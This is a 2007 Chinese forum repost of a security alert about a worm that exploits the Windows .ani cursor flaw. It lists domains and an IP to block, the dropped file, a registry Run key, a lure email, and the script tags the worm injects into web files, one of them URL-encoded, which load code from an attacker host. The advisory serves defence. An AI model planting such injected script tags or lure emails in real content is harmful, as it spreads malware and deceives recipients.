 |
| 等 级:资深长老 |
| 经 验 值:10916 |
| 魅 力 值:6914 |
| 龙 币:25858 |
| 积 分:15580.8 |
| 注册日期:2004-06-30 |
| |
|
|
|
大家可以使用修改修改注册表和屏幕恶意攻击网站的方式暂时处理~等专杀工具出来后再全面查杀~
一个非常不好的消息要告诉大家,利用微软动画光标漏洞的新蠕虫已经现身。我们收到了相关的样本,通过分析,我们已经确认这是一个复合型蠕虫,含有类似熊猫烧香的感染功能、下载其他病毒的功能、发送含有最新.ani漏洞网址邮件的功能、感染html等文件并向这些文件里添加含有最新漏洞网址的功能。由于危险程度非常高,CISRT Lab决定再次发布中度风险警报,提醒广大网友提高警惕!
同时我们建议广大网友、企业网管对以下两个域名和IP进行屏蔽:
2007ip.com
microfsot.com
61.153.247.76
蠕虫的大小在13K左右,会释放文件到以下目录:
%SYSTEM%\sysload3.exe
添加注册表键值:
HKCU\Software\Microsoft\Windows\CurrentVersion\Run
"System Boot Check"="%SYSTEM%\sysload3.exe"
会发送邮件:
From:
Subject:你和谁视频的时候被拍下的?给你笑死了!
Body:
看你那小样!我看你是出名了!
你看这个地址!你的脸拍的那么清楚!你变明星了!
该网址不再展示
感染.HTML .ASPX .HTM .PHP .JSP .ASP和 .EXE文件,并向.HTML .ASPX .HTM .PHP .JSP .ASP文件里植入以下代码:
<script src=http://macr.microfsot.com/<removed>.js></script>
或者
<script language="javascript" src="http://%6D%61%63%72%2E%6D%69%63%72%6F%66%73%6F%74%2E%63%6F%6D/<removed>.js"></script>
注意邮件和网页中提到的网址中都含有.ani 0-day漏洞的恶意文件。
Kaspersky检测为Trojan-Downloader.Win32.Agent.bky,毒霸命名为Worm.MyInfect
|
|
--
大事难事看担当,逆境顺境看胸襟,有舍有得看智慧,是成是败看坚持
~河蟹评论~道理你懂~
 |
|
|
2007-04-01 16:58:35
